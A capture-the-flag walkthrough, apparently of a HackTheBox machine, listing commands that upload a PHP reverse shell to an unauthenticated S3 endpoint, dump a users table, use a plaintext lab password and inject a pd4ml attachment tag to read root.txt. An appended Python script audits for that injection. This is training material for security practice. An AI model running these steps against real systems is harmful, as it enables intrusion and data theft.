October 24, 2020 at 04:37 PM
# install aws-cli
sudo apt-get install awscli
# configure aws
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request
# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request
- Enumerating /shell/ in http://s3.bucket.htb reveals the presence of dynamodb
# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request
# scanning the enumerated tables (accessing the values in them)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request
- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it at http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell
# after obtaining a reverse shell as www-data
su roy    # password: n2vM-<_K_Q:.Aa2
- User.txt can be found in home directory of roy
- aws is installed on the system, and there are internal services on port 8000 (web service) and port 4566 (aws service)
- forward port 8000 to the local machine with chisel
- bucket-app/index.php shows another communication with the internal service: a new table named alerts, which is accessed on a POST request, with the values data
# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566
# insert an item into the table with the values requested by index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566
- Now after inserting everything needed, make a curl POST
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
- Check out http://127.0.0.1:8000/files in your browser to obtain the root.txt
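A defender's view of the last step, as an added example that is not part of the original write-up: the service on port 8000 hands whatever is stored in the alerts table to pd4ml, an HTML-to-PDF converter, so the Python code below audits the JSON output of aws dynamodb scan for pd4ml directives and file: URLs and shows HTML-escaping the stored text before conversion. The function names, the constructed sample items, and the assumption that escaping is applied before the converter sees the data are mine.

```python
import html
import json
import re

# Tags in the pd4ml: namespace are converter directives, not display content.
PD4ML_TAG = re.compile(r"<\s*/?\s*pd4ml:[\w-]+", re.IGNORECASE)
# file: URLs make a server-side renderer read from the local filesystem.
LOCAL_URL = re.compile(r"\bfile:/", re.IGNORECASE)


def string_values(item):
    """Yield (attribute, text) for every string attribute (type S) of a DynamoDB item."""
    for name, typed in item.items():
        if "S" in typed:
            yield name, typed["S"]


def audit_scan(scan_json):
    """Return sorted (title, attribute, reason) findings for a `dynamodb scan` result."""
    findings = []
    for item in json.loads(scan_json).get("Items", []):
        title = item.get("title", {}).get("S", "<no title>")
        for name, text in string_values(item):
            if PD4ML_TAG.search(text):
                findings.append((title, name, "pd4ml directive"))
            if LOCAL_URL.search(text):
                findings.append((title, name, "local URL"))
    return sorted(findings)


def render_safe(text):
    """Escape stored text so the converter prints it instead of interpreting it."""
    return html.escape(text, quote=True)


# Constructed sample in the shape of `aws dynamodb scan --table-name alerts` output.
SAMPLE = json.dumps({"Items": [
    {"title": {"S": "Disk usage"}, "data": {"S": "Volume /var is at 91%"}},
    {"title": {"S": "Ransomware"}, "data": {"S":
        '<pd4ml:attachment description="attached.txt" icon="PushPin">'
        "file:///root/root.txt</pd4ml:attachment>"}},
], "Count": 2})

if __name__ == "__main__":
    for finding in audit_scan(SAMPLE):
        print(finding)
```

Escaping only addresses the rendering side; the table is writable in the first place because the endpoint on port 4566 accepts requests without credentials.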